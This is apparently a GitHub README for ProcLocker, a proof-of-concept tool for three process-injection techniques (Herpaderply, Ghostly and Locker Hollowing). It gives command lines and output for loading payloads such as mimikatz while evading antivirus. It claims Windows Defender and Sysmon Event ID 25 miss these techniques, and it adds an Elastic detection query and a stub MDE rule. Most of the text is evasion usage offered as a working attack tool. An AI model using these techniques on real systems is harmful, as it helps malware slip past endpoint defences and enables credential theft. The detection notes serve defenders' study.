Skip to content

Herpaderply Hollowing - a PE injection technique, hybrid between Process Hollowing and Process Herpaderping

Notifications You must be signed in to change notification settings

Hagrid29/herpaderply_hollowing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Herpaderply Hollowing | Ghostly Hollowing | Locker Hollowing

This is just a PoC script of Herpaderply Hollowing, Ghostly Hollowing and Locker Hollowing. See how to encrypt payload and self inject in PELoader.

Process Locker is my version of variation of Process Herpaderping. Instead of overwriting the payload just after the execution, Process Locker duplicate the file handle of payload to a running process in order to "lock" the file. The "locked" payload usually not examined by AV/EDR.

Credits: most of my work was based on @hasherezade's PoC.

Characteristics of each hollowing

  • Payload mapped as MEM_IMAGE
  • Sections mapped with original access rights (no RWX)
  • Payload connected to PEB as the main module

Herpaderply Hollowing

Herpaderply Hollowing is a hybrid between Process Hollowing and Process Herpaderping

HerpaderplyHollowing

Process Herpaderping

cmd> .\ProcLocker.exe herpaderp process callback.exe 

Herpaderply Hollowing

cmd> .\ProcLocker.exe herpaderp hollow callback.exe 
[+] Created temp file: C:\Users\XXX\AppData\Local\Temp\TH1F9C.tmp
[+] Written!
[+] Overwriting file content
[+] Created Process PID: 21812
[+] Resuming PID 21812
[+] Done!

Windows Defender detect Process Herpaderping while failed to detect Herpaderply Hollowing

Elastic suggest to identify process execution followed by a file overwrite of an executable by the same parent process. ref

sequence with maxspan=5s [process where event.type == "start" and
not process.parent.executable :
"C:\\Windows\\SoftwareDistribution\\*.exe"] by host.id,
process.executable, process.parent.entity_id [file where event.type
== "change" and event.action == "overwrite" and file.extension ==
"exe"] by host.id, file.path, process.entity_id

Ghostly Hollowing

Ghostly Hollowing is a hybrid between Process Hollowing and Process Ghosting

GhostlyHollowing

Process Ghosting

cmd> .\ProcLocker.exe ghost process mimikatz.exe

Ghostly Hollowing

cmd> .\ProcLocker.exe ghost hollow callback.exe

Windows Defender failed to detect Process Ghosting and Ghostly Hollowing.

The program map the payload from a delete pending file. It could be an indicator of process ghosting or ghostly hollowing. I wrote a MDE rule for example below.

DeviceImageLoadEvents
| where TimeStamp >= ago(1h)
| where SHA1 == ""

Locker Hollowing

Locker Hollowing is a hybrid between Process Hollowing and Process Lockering.

LockerHollowing

Process Lockering

cmd> .\ProcLocker.exe locker process mimikatz.exe 19408 auto
[+] Created temp file: C:\Users\xxx\AppData\Local\Temp\TH82F6.tmp
[+] Written!
[+] Duplicating file handle to 19408
[+] File locked 
[+] Process created! Pid = 11976
[+] Done!

Locker Hollowing

cmd> .\ProcLocker.exe locker hollow callback.exe 19408 auto

Or we can split the step into:

  1. "lock" the payload by duplicating file handle to a running process.
  2. map the payload from the "locked" file and execute it.
  3. clean up the "locked" payload.
cmd> .\ProcLocker.exe lock mimikatz.exe 19408
[+] Created temp file: C:\Users\xxx\AppData\Local\Temp\TH1827.tmp
[+] Written!
[+] Duplicating file handle to 19408
[+] File locked

cmd> .\ProcLocker.exe locker process TH1827.tmp 19408 exec
[+] Getting system handle list
[+] Found remote file handle of "\Users\xxx\AppData\Local\Temp\TH1827.tmp"
[+] Duplicating file handle to current process
[+] Process created! Pid = 12080
[+] Done!

cmd> .\ProcLocker.exe clear TH1827.tmp 19408 
[+] Getting system handle list
[+] Found remote file handle of "\Users\xxx\AppData\Local\Temp\TH1827.tmp"
[+] Duplicating file handle to current process
[+] Releasing the file handle. You can manually remove the file
[+] Overwriting file content

Windows Defender detect Process Lockering while failed to detect Locker Hollowing.

The program map the payload from a "locked" file. It could be an indicator of process Lockering.

Sysmon Event ID 25

Sysmon Event ID 25 triggers "when the mapped image of a process doesn't match the on-disk image file, or the image file is locked for exclusive access."

It would be logged for process herpaderping, process ghosting and process lockering. However, it would not be logged for Herpaderply Hollowing, Ghostly Hollowing or Locker Hollowing.

detection-of-process-lockering

detection-of-process-ghosting

References

About

Herpaderply Hollowing - a PE injection technique, hybrid between Process Hollowing and Process Herpaderping

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published